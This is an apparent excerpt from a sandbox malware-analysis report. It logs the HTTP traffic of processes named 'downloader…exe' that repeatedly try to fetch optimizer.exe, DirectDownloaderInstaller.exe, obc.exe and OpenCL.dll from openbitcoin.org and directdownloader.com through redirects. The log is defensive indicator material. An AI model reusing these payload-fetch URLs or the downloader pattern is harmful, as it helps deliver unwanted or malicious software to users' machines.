    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 110
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 122
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 111
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 111
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 114
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:29 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:29 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:29 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:29 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 115
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 115
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 115
  • flag-us
    GET
    http://openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    216.239.32.21:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: http://www.openbitcoin.org/static/dist/OpenCL.dll
    Date: Mon, 25 Dec 2023 11:01:38 GMT
    Content-Type: text/html; charset=UTF-8
    Server: ghs
    Content-Length: 246
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:59 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-us
    GET
    http://www.directdownloader.com/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    162.255.119.249:80
    Request
    GET /DirectDownloaderInstaller.exe HTTP/1.0
    Host: www.directdownloader.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.1 302 Found
    Date: Mon, 25 Dec 2023 11:01:35 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 113
    Connection: close
    Location: http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe
    X-Served-By: Namecheap URL Forward
    Server: namecheap-nginx
  • flag-us
    GET
    http://www.directdownloader.com/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    162.255.119.249:80
    Request
    GET /toolbars/optimizer.exe HTTP/1.0
    Host: www.directdownloader.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.1 302 Found
    Date: Mon, 25 Dec 2023 11:01:35 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 106
    Connection: close
    Location: http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe
    X-Served-By: Namecheap URL Forward
    Server: namecheap-nginx
  • flag-gb
    GET
    http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    142.250.200.4:80
    Request
    GET /enterprise/apps/business/products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: www.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 284
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:34 GMT
    Expires: Mon, 25 Dec 2023 11:29:34 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 121
  • GET
    http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe
    Request
    GET /enterprise/apps/business/products.html/toolbars/optimizer.exe HTTP/1.0
    Host: www.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 277
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:34 GMT
    Expires: Mon, 25 Dec 2023 11:29:34 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 130
  • GET
    http://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe
    Request
    GET /apps/business/products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: enterprise.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://gsuite.google.com/products.html/DirectDownloaderInstaller.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 266
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 120
  • GET
    http://gsuite.google.com/products.html/DirectDownloaderInstaller.exe
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: gsuite.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 120
  • GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 122
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:38 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:39 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 122
  • GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 122
  • GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 128
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:39 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:40 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:40 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:46 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe
    Request
    GET /apps/business/products.html/toolbars/optimizer.exe HTTP/1.0
    Host: enterprise.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://gsuite.google.com/products.html/toolbars/optimizer.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 259
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 129
  • GET
    http://gsuite.google.com/products.html/toolbars/optimizer.exe
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: gsuite.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 129
  • GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 127
  • GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 127
  • GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 127
  • GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 128
  • GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 128
  • GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 131
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:46 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:47 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:47 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:50 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
